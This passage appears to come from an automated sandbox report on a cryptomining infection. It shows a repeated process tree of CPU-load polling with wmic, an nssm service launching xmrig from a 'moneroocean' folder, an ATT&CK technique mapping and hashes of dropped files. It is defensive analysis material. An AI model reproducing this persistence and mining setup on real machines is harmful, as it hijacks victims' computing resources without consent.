                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2364
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1804
                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                              timeout /t 1
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                              PID:4460
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3232
                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5012
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:4432
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3336
                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1428
                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4484
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4612
                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1668
                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:2124
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4924
                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:712
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:5048
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:3772
                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4348
                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:1180
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:1068
                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4848
                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                        PID:1252
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2236
                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4396
                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:4648
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3484
                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4528
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:4604
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:3860
                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1064
                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:2988
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1060
                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1112
                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:2008
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2632
                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2832
                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                            PID:2380
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4944
                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3376
                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                PID:1244
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4152
                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4844
                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                    PID:3320
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:396
                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4384
                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:3064
                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:3712
                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                            PID:3884
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2956
                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:1732
                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                PID:3984
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:432
                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:1936
                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                    PID:3396
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:2276
                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5100
                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                        PID:4444
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:540
                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:1104
                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                            PID:1548
                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:4488
                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:1132
                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                PID:2724
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:640
                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2040
                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                    PID:3964
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:4072
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4916
                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                        PID:4876
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:3356
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:4624
                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                            PID:5068
                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:916
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4600
                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                PID:1560
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:3352
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:4416
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:1972
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:4092
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:1700
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                          PID:864
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:4572
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:4316
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                              timeout /t 1
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                              PID:4948
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:4476
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:744
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                  PID:4976
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:1508
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:4228
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                      PID:1064
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:4972
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:2988
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                          PID:3880
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:1060
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:2008
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                              timeout /t 1
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                              PID:2968
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:2632
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:4388
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                PID:4468
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\moneroocean\xmrig.exe"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                  PID:2020

                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                                                              System Services

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1569

                                                                                                                                                                                                                                                                                                              Service Execution

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1569.002

                                                                                                                                                                                                                                                                                                              Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1059

                                                                                                                                                                                                                                                                                                              PowerShell

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1059.001

                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                              Create or Modify System Process

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1543

                                                                                                                                                                                                                                                                                                              Windows Service

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1543.003

                                                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                                                              Create or Modify System Process

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1543

                                                                                                                                                                                                                                                                                                              Windows Service

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1543.003

                                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                                              Impair Defenses

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1562

                                                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                                                              Impact

                                                                                                                                                                                                                                                                                                              Service Stop

                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                              T1489

                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                5b5352c55a8e79ac8de4be3202d496a1

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                4a263d9e36e5ef972e4b19035cae169e1df6459c

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                c5640c45794c5f98064ce289168dc33b

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                60b86c9b8437c4a0cc4a3aced9c6d129b2a03e02

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                8c0699be929911d958197c7335285d3a0f41c4ea4066e0b618e067561e278852

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                9120422754a8db684e0d9935a85f6117b5cc5ff8f77e6f2a98f658130488824433083106034baf6e8e3003b4ff7c15e8678a7a80cc137a70902f014a40c5456a

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                c89b5f713c015e7e9dcb03d9f86d2b2d

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                4d7db9ce5b1991e4d12bea6c13dac2261b71f3da

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                6b5e93bc9ed7292429b045e2bf2474aa451facb693ffbe3cdd71e4b343303fc8

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                78dea2fa70071f60c3c0c15267f2d394589c228eb2eed788daae51ae21796996576b1691b5e8059ba534a04902abf223e56459cd69b9c360cc7889020d294aa6

